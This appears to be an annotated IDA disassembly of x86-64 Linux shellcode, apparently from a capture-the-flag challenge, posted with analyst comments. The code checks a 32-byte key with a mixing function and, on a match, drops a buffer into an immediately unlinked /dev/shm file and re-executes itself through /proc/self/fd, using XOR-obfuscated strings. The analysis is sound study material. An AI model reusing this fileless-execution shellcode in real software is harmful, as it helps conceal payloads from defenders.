
@L4ys /shellcode.asm Secret
Last active Dec 31, 2016

seg000:0000000000000000 ; Analyst notes (review): x86-64 Linux shellcode, IDA listing. Syscall numbers
seg000:0000000000000000 ; below are named from the Linux x86-64 table. rbp is set to original rsp - 0x78
seg000:0000000000000000 ; and later serves as the base for reads from the caller's stack (rbp+160, rbp-4580, ...).
seg000:0000000000000000 48 89 E5 mov rbp, rsp ; rbp = original rsp
seg000:0000000000000003 48 83 ED 78 sub rbp, 78h ; rbp = original rsp - 0x78
seg000:0000000000000007 BF 00 00 00 00 mov edi, 0 ; mmap addr = NULL
seg000:000000000000000C BE 00 00 10 00 mov esi, 100000h ; length = 1 MiB
seg000:0000000000000011 BA 03 00 00 00 mov edx, 3 ; PROT_READ|PROT_WRITE (no PROT_EXEC)
seg000:0000000000000016 41 BA 22 00 00 00 mov r10d, 22h ; '"' ; MAP_PRIVATE|MAP_ANONYMOUS (4th syscall arg goes in r10)
seg000:000000000000001C 49 C7 C0 FF FF FF FF mov r8, 0FFFFFFFFFFFFFFFFh ; fd = -1
seg000:0000000000000023 41 B9 00 00 00 00 mov r9d, 0 ; offset = 0
seg000:0000000000000029 B8 09 00 00 00 mov eax, 9 ; SYS_mmap
seg000:000000000000002E 0F 05 syscall ; rax = mapping base, or -errno on failure
seg000:0000000000000030 48 89 C4 mov rsp, rax ; NOTE(review): rax is not checked for -errno before becoming the stack pointer
seg000:0000000000000033 48 81 C4 00 FF 0F 00 add rsp, 0FFF00h ; new stack = 0x100 bytes below the top of the 1 MiB region
seg000:000000000000003A 48 B8 FE C4 00 37 13 00 C3 33 mov rax, 33C300133700C4FEh
seg000:0000000000000044 50 push rax ; high qword of a 128-bit constant (pushed first = higher address)
seg000:0000000000000045 48 B8 D3 C0 00 4D D3 00 BE B4 mov rax, 0B4BE00D34D00C0D3h
seg000:000000000000004F 50 push rax ; low qword (pushed last = lower address)
seg000:0000000000000050 F3 0F 6F 24 24 movdqu xmm4, xmmword ptr [rsp] ; xmm4 = constant xor'ed in each round of the loop at loc_6A
seg000:0000000000000055
seg000:0000000000000055 ; 42 rounds of a mixing function over 32 bytes read from the original stack
seg000:0000000000000055 ; (rbp+160 = original rsp+40, rbp+176 = original rsp+56). The result is then
seg000:0000000000000055 ; compared against two fixed 128-bit values; any mismatch jumps to loc_238.
seg000:0000000000000055 loc_55:
seg000:0000000000000055 F3 0F 6F 8D A0 00 00 00 movdqu xmm1, xmmword ptr [rbp+160] ; input block 0 (original rsp+40)
seg000:000000000000005D F3 0F 6F 95 B0 00 00 00 movdqu xmm2, xmmword ptr [rbp+176] ; input block 1 (original rsp+56)
seg000:0000000000000065 B9 2A 00 00 00 mov ecx, 42 ; round counter for `loop`
seg000:000000000000006A
seg000:000000000000006A loc_6A: ; CODE XREF: sub_3A+7Cj
seg000:000000000000006A F3 0F 6F D9 movdqu xmm3, xmm1 ; xmm3 = old xmm1
seg000:000000000000006E 66 0F 15 CA unpckhpd xmm1, xmm2 ; xmm1 = {lo: xmm1.hi, hi: xmm2.hi}
seg000:0000000000000072 66 0F 14 D3 unpcklpd xmm2, xmm3 ; xmm2 = {lo: xmm2.lo, hi: old xmm1.lo}
seg000:0000000000000076 F2 0F 70 C9 8D pshuflw xmm1, xmm1, 141 ; permute the 16-bit words of the low qword
seg000:000000000000007B F2 0F 70 D2 39 pshuflw xmm2, xmm2, 57
seg000:0000000000000080 F3 0F 70 C9 D2 pshufhw xmm1, xmm1, 210 ; permute the 16-bit words of the high qword
seg000:0000000000000085 F3 0F 70 D2 87 pshufhw xmm2, xmm2, 135
seg000:000000000000008A F3 0F 6F D9 movdqu xmm3, xmm1
seg000:000000000000008E 66 0F 73 F3 0D psllq xmm3, 0Dh ; (x << 13) | (x >> 51) per 64-bit lane
seg000:0000000000000093 66 0F 73 D1 33 psrlq xmm1, 33h ; '3' ; = rotate left by 13 (13 + 51 = 64)
seg000:0000000000000098 66 0F EF CB pxor xmm1, xmm3
seg000:000000000000009C 66 0F EF CC pxor xmm1, xmm4 ; xor with the round constant
seg000:00000000000000A0 F3 0F 6F DA movdqu xmm3, xmm2
seg000:00000000000000A4 66 0F 73 D3 11 psrlq xmm3, 11h ; (x >> 17) | (x << 47) per 64-bit lane
seg000:00000000000000A9 66 0F 73 F2 2F psllq xmm2, 2Fh ; '/' ; = rotate right by 17 (17 + 47 = 64)
seg000:00000000000000AE 66 0F EF D3 pxor xmm2, xmm3
seg000:00000000000000B2 66 0F EF D4 pxor xmm2, xmm4 ; xor with the round constant
seg000:00000000000000B6 E2 B2 loop loc_6A ; rcx--; repeat while rcx != 0 (42 rounds total)
seg000:00000000000000B8 48 B8 18 02 7D 0F 90 EA 7A AF mov rax, 0AF7AEA900F7D0218h ; expected xmm1, high qword
seg000:00000000000000C2 50 push rax
seg000:00000000000000C3 48 B8 6C 19 E2 79 98 63 76 8A mov rax, 8A76639879E2196Ch ; expected xmm1, low qword
seg000:00000000000000CD 50 push rax
seg000:00000000000000CE F3 0F 6F 24 24 movdqu xmm4, xmmword ptr [rsp] ; xmm4 now holds the expected value
seg000:00000000000000D3 66 0F 38 29 E1 pcmpeqq xmm4, xmm1 ; per-lane 64-bit equality (SSE4.1)
seg000:00000000000000D8 66 0F D7 C4 pmovmskb eax, xmm4 ; 16-bit mask, one bit per byte
seg000:00000000000000DC 3D FF FF 00 00 cmp eax, 0FFFFh ; all 16 bytes set <=> both lanes matched
seg000:00000000000000E1 0F 85 51 01 00 00 jnz loc_238 ; mismatch: sleep-forever path
seg000:00000000000000E7 48 B8 80 FC F2 9F F2 A7 C0 74 mov rax, 74C0A7F29FF2FC80h ; expected xmm2, high qword
seg000:00000000000000F1 50 push rax
seg000:00000000000000F2 48 B8 B2 BD FA AE B9 62 36 C2 mov rax, 0C23662B9AEFABDB2h ; expected xmm2, low qword
seg000:00000000000000FC 50 push rax
seg000:00000000000000FD F3 0F 6F 24 24 movdqu xmm4, xmmword ptr [rsp]
seg000:0000000000000102 66 0F 38 29 E2 pcmpeqq xmm4, xmm2 ; same check for the second half
seg000:0000000000000107 66 0F D7 C4 pmovmskb eax, xmm4
seg000:000000000000010B 3D FF FF 00 00 cmp eax, 0FFFFh
seg000:0000000000000110 0F 85 22 01 00 00 jnz loc_238 ; mismatch: sleep-forever path
seg000:0000000000000116 ; File drop. r12 points at a buffer located through the original stack (its
seg000:0000000000000116 ; contents are not visible in this listing). The path is XOR-decoded with the
seg000:0000000000000116 ; key in rbx to "/dev/shm/r12j2x"; the file is created, immediately unlinked,
seg000:0000000000000116 ; and then written through the still-open descriptor, so no directory entry
seg000:0000000000000116 ; remains on disk (detection-relevant: open+unlink+write on /dev/shm).
seg000:0000000000000116 4C 8B A5 1C EE FF FF mov r12, [rbp-4580] ; file ptr ; buffer to be written out
seg000:000000000000011D 66 41 C7 44 24 25 C2 06 mov word ptr [r12+25h], 6C2h ; patch a 16-bit field at buffer offset 0x25 before writing (meaning not recoverable here)
seg000:0000000000000125 48 BB 9A 53 0D 6C 55 81 E4 07 mov rbx, 7E481556C0D539Ah ; XOR key for the obfuscated strings
seg000:000000000000012F 48 B8 B5 21 3C 5E 3F B3 9C 07 mov rax, 79CB33F5E3C21B5h
seg000:0000000000000139 48 31 D8 xor rax, rbx ; -> "/r12j2x\0" (second half of the path)
seg000:000000000000013C 50 push rax
seg000:000000000000013D 48 B8 B5 37 68 1A 7A F2 8C 6A mov rax, 6A8CF27A1A6837B5h
seg000:0000000000000147 48 31 D8 xor rax, rbx ; -> "/dev/shm" (first half of the path)
seg000:000000000000014A 50 push rax
seg000:000000000000014B 48 89 E7 mov rdi, rsp ; pathname = "/dev/shm/r12j2x"
seg000:000000000000014E BE 42 02 00 00 mov esi, 242h ; O_RDWR|O_CREAT|O_TRUNC
seg000:0000000000000153 BA 80 01 00 00 mov edx, 180h ; mode 0600
seg000:0000000000000158 B8 02 00 00 00 mov eax, 2 ; SYS_open
seg000:000000000000015D 0F 05 syscall ; open ; rax = fd, not checked for -errno
seg000:000000000000015F 49 89 C5 mov r13, rax ; r13 = fd
seg000:0000000000000162 B8 57 00 00 00 mov eax, 87 ; SYS_unlink; rdi still holds the pathname (syscall clobbers only rcx/r11)
seg000:0000000000000167 0F 05 syscall ; unlink the file right after creating it
seg000:0000000000000169 4C 89 EF mov rdi, r13 ; fd
seg000:000000000000016C 4C 89 E6 mov rsi, r12 ; buf
seg000:000000000000016F BA 00 02 01 00 mov edx, 10200h ; count = 0x10200 (66048) bytes
seg000:0000000000000174 B8 01 00 00 00 mov eax, 1 ; write
seg000:0000000000000179 0F 05 syscall ; write(fd, buf, 0x10200); return value unchecked
seg000:000000000000017B 4C 89 E8 mov rax, r13 ; rax = fd, to be rendered as a decimal string
seg000:000000000000017E 48 89 E7 mov rdi, rsp ; output cursor; overwrites the path string
seg000:0000000000000181 48 89 E6 mov rsi, rsp ; start of the digit buffer
seg000:0000000000000184
seg000:0000000000000184 ; Unsigned itoa of rax (the fd) into the buffer at rdi, least significant digit first.
seg000:0000000000000184 loc_184: ; CODE XREF: sub_3A+160j
seg000:0000000000000184 48 31 D2 xor rdx, rdx ; rdx:rax = rax before the div
seg000:0000000000000187 B9 0A 00 00 00 mov ecx, 0Ah
seg000:000000000000018C 48 F7 F1 div rcx ; rax = rax / 10, rdx = rax % 10
seg000:000000000000018F 80 C2 30 add dl, 30h ; '0' ; digit -> ASCII
seg000:0000000000000192 88 17 mov [rdi], dl
seg000:0000000000000194 48 FF C7 inc rdi
seg000:0000000000000197 48 85 C0 test rax, rax
seg000:000000000000019A 75 E8 jnz short loc_184 ; until the quotient is 0 (always emits at least one digit)
seg000:000000000000019C C6 07 00 mov byte ptr [rdi], 0 ; NUL terminator
seg000:000000000000019F 48 FF CF dec rdi ; rdi = last digit, rsi = first digit
seg000:00000000000001A2
seg000:00000000000001A2 ; Intended in-place reversal of the digits. NOTE(review): neither rdi nor rsi
seg000:00000000000001A2 ; is adjusted inside the loop, so after the first swap rdi >= rsi and the `jl`
seg000:00000000000001A2 ; is never taken: only the first and last digits are exchanged, which reverses
seg000:00000000000001A2 ; strings of at most three digits correctly. The swap also clobbers bl (rbx).
seg000:00000000000001A2 loc_1A2: ; CODE XREF: sub_3A+173j
seg000:00000000000001A2 8A 07 mov al, [rdi]
seg000:00000000000001A4 8A 1E mov bl, [rsi]
seg000:00000000000001A6 88 1F mov [rdi], bl
seg000:00000000000001A8 88 06 mov [rsi], al
seg000:00000000000001AA 48 39 F7 cmp rdi, rsi
seg000:00000000000001AD 7C F3 jl short loc_1A2 ; signed compare of pointers; body effectively runs once
seg000:00000000000001AF ; Build execve arguments. XOR-decoded strings (key in rbx): "  /proc/self/fd/"
seg000:00000000000001AF ; (r14 = rsp+2 -> "/proc/self/fd/<fd digits>", the digit buffer lying contiguously
seg000:00000000000001AF ; above it on the stack) and "/proc/self/exe". Net effect: re-execute the current
seg000:00000000000001AF ; image with the unlinked /dev/shm file, referenced via its fd, as argv[1].
seg000:00000000000001AF 48 BB 9A 53 0D 6C 55 81 E4 07 mov rbx, 7E481556C0D539Ah ; reload the XOR key (bl was clobbered by the swap loop)
seg000:00000000000001B9 48 B8 E9 36 61 0A 7A E7 80 28 mov rax, 2880E77A0A6136E9h
seg000:00000000000001C3 48 31 D8 xor rax, rbx ; -> "self/fd/"
seg000:00000000000001C6 50 push rax
seg000:00000000000001C7 48 B8 BA 73 22 1C 27 EE 87 28 mov rax, 2887EE271C2273BAh
seg000:00000000000001D1 48 31 D8 xor rax, rbx ; -> "  /proc/" (two leading spaces)
seg000:00000000000001D4 50 push rax
seg000:00000000000001D5 4C 8D 74 24 02 lea r14, [rsp+50h+var_4E] ; r14 = rsp+2 -> "/proc/self/fd/<digits>"
seg000:00000000000001DA 48 8B 55 38 mov rdx, [rbp+56] ; pointer read from the original stack (rbp+56 = original rsp-64)
seg000:00000000000001DE 48 8B 92 28 FC 31 00 mov rdx, [rdx+31FC28h] ; rdx = envp for execve; what it points to is not recoverable from the listing
seg000:00000000000001E5 48 B8 F6 35 22 09 2D E4 E4 07 mov rax, 7E4E42D092235F6h
seg000:00000000000001EF 48 31 D8 xor rax, rbx ; -> "lf/exe\0\0"
seg000:00000000000001F2 50 push rax
seg000:00000000000001F3 48 B8 B5 23 7F 03 36 AE 97 62 mov rax, 6297AE36037F23B5h
seg000:00000000000001FD 48 31 D8 xor rax, rbx ; -> "/proc/se"
seg000:0000000000000200 50 push rax
seg000:0000000000000201 48 89 E7 mov rdi, rsp ; filename = "/proc/self/exe"
seg000:0000000000000204 48 B8 FF 21 0D 6C 55 81 E4 07 mov rax, 7E481556C0D21FFh
seg000:000000000000020E 48 31 D8 xor rax, rbx ; dead: rax is overwritten by the next mov
seg000:0000000000000211 48 B8 FD 3E 68 33 25 ED 85 7E mov rax, 7E85ED2533683EFDh
seg000:000000000000021B 48 31 D8 xor rax, rbx ; -> 8 bytes "gme_play", not NUL-terminated (runs into "/proc/self/exe" above)
seg000:000000000000021E 50 push rax
seg000:000000000000021F 48 89 E6 mov rsi, rsp ; argv[0] string
seg000:0000000000000222 6A 00 push 0 ; argv[2] = NULL
seg000:0000000000000224 41 56 push r14 ; argv[1] = "/proc/self/fd/<digits>"
seg000:0000000000000226 56 push rsi ; argv[0]
seg000:0000000000000227 48 89 E6 mov rsi, rsp ; argv
seg000:000000000000022A B8 3B 00 00 00 mov eax, 59 ; SYS_execve(filename, argv, envp)
seg000:000000000000022F 0F 05 syscall ; returns only on failure
seg000:0000000000000231 B8 3C 00 00 00 mov eax, 60 ; SYS_exit; rdi still holds the filename pointer, so the status is its low byte
seg000:0000000000000236 0F 05 syscall
seg000:0000000000000238
seg000:0000000000000238 ; Failure path (key mismatch): sleep forever. Each iteration pushes a fresh
seg000:0000000000000238 ; 16-byte timespec and never pops it, so rsp creeps down through the mmap region.
seg000:0000000000000238 loc_238: ; CODE XREF: sub_3A+A7j
seg000:0000000000000238 ; sub_3A+D6j ...
seg000:0000000000000238 68 37 13 00 00 push 1337h ; tv_nsec = 0x1337 (higher address)
seg000:000000000000023D 68 37 13 00 00 push 1337h ; tv_sec = 0x1337 (lower address)
seg000:0000000000000242 48 89 E7 mov rdi, rsp ; req = &timespec
seg000:0000000000000245 BE 00 00 00 00 mov esi, 0 ; rem = NULL
seg000:000000000000024A B8 23 00 00 00 mov eax, 35 ; SYS_nanosleep
seg000:000000000000024F 0F 05 syscall
seg000:0000000000000251 EB E5 jmp short loc_238 ; unconditional: never exits
seg000:0000000000000251